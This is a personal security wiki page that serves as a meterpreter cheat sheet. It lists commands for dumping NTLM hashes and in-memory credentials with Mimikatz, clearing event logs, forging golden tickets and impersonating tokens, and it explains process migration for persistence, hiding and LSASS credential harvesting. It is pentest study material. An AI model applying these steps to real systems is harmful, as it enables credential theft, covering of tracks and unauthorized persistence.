meterpreter - Cardboard Iguana Security

# meterpreter The meterpreter reverse shell *requires* a connection back to [[msfconsole]] using multi/handler. ## Commands - `background` - background the current session and return to the [[msfconsole|Metasploit console]] - `clearenv` - clears the (Windows) [[Windows event logs|event logs]] (kinda obvious) - `creds_all` - dump all user credentials in memory (requires the `kiwi` module) - `download` - transfer a file from the target to the attacker - `edit` - edit a file - `getpid` - get current process ID - `getprivs` - display current user privileges - `getsystem` - attempt to elevate to SYSTEM/root - `getuid` - get current process user - `golden_ticket_create` - create a golden ticket (requires the `kiwi` module) - `guid` - get session ID - `hashdump` - dump [[NTLM hashes|NLTM hashes]] from the SAM (Windows-only, requires system privileges); fields are username, RID (the last four digits of the Windows SID, with leading zeros dropped), LM password hash, NTLM password hash - `ifconfig` - display host network interface information - `info` - get information about a meterpreter extension - `load` - load meterpreter extension - `load kiwi` - load [[Mimikatz]] extension - `migrate` - migrate meterpreter to another process - `netstat` - display host network connections - `portfwd` - forward a port on the host - `route` - mess with the host routing tables - `run` - run a meterpreter extension - `search` - search for files - `sessions` - switch to another (Metasploit) session - `shell` - drop to system shell (return to meterpreter using `CTRL + Z`) - `sysinfo` - pull remote system information - `upload` - transfer a file from the attacker to the target meterpreter sessions can be backgrounded using the `background` command, and all sessions can be backgrounded using `CTRL + Z`. List sessions using the `sessions` command, and foreground a session using `session -i #`, where `#` is the session number. The `sessions` command is also used to connect to meterpreter sessions that have been caught after a successfully executed exploit. ## Extensions ### Loading PowerShell ```meterpreter load powershell powershell_shell ``` *Don't* try to exit PowerShell - trying to do this produces consistent hangs for me. Instead, background the process with `^Z`. ### Using Mimikatz ![[Call Mimikatz from a meterpreter shell]] ### User impersonation ```meterpreter load incognito list_tokens -u impersonate_token $DOMAIN\\$USER ``` Not 100% sure where the "tokens" come from here... [[Call Mimikatz from a meterpreter shell|Mimikatz]], maybe? ## Process migration I *think* that meterpreter is being run directly from memory, and [what `migrate` is doing](https://security.stackexchange.com/questions/90578/how-does-process-migration-work-in-meterpreter/92893#92893) is basically creating a new process using the memory of a different application, hopping to that process, and then shutting down the old process. Reasons to migrate the meterpreter process: - For [persistence](https://www.hackingarticles.in/multiple-ways-to-persistence-on-windows-10-with-metasploit/) (pick a long-running process) - To make sure that the meterpreter *process* has system privileges - To hide (pick a process less likely to be examined) - To stabilize the shell (initial exploits often produce somewhat unstable sessions) - To move laterally or escalate privileges within a system (if you're lucky) - To gain additional capabilities In particular, harvesting credentials from LSASS requires that meterpreter be living in a process with the same permissions (NT AUTHORITY/SYSTEM) and architecture as LSASS; migrating meterpreter can help us realize this. The print spooler service (spoolsv.exe) is often a good choice, as it runs with elevated permissions, has the same architecture as the system itself, and will restart itself automatically. You can also use lsass.exe directly if you feel like living dangerously. Another example is that dumping keystrokes will only work when meterpreter is attached to a word processor or text editor. Note that meterpreter will happily let you migrate from a privileged to an unprivileged process - which may cause you to loose control of the target system! Additionally, migrating meterpreter will change its current working directory to that of the process it's attaching to. Executing `run post/windows/manage/migrate` will cause meterpreter to try to migrate to another process in an automated fashion. I'm not sure how "smart" this is in practice. %% ## Reusing local ports ![[Re-use local ports in Metasploit with meterpreter]] %%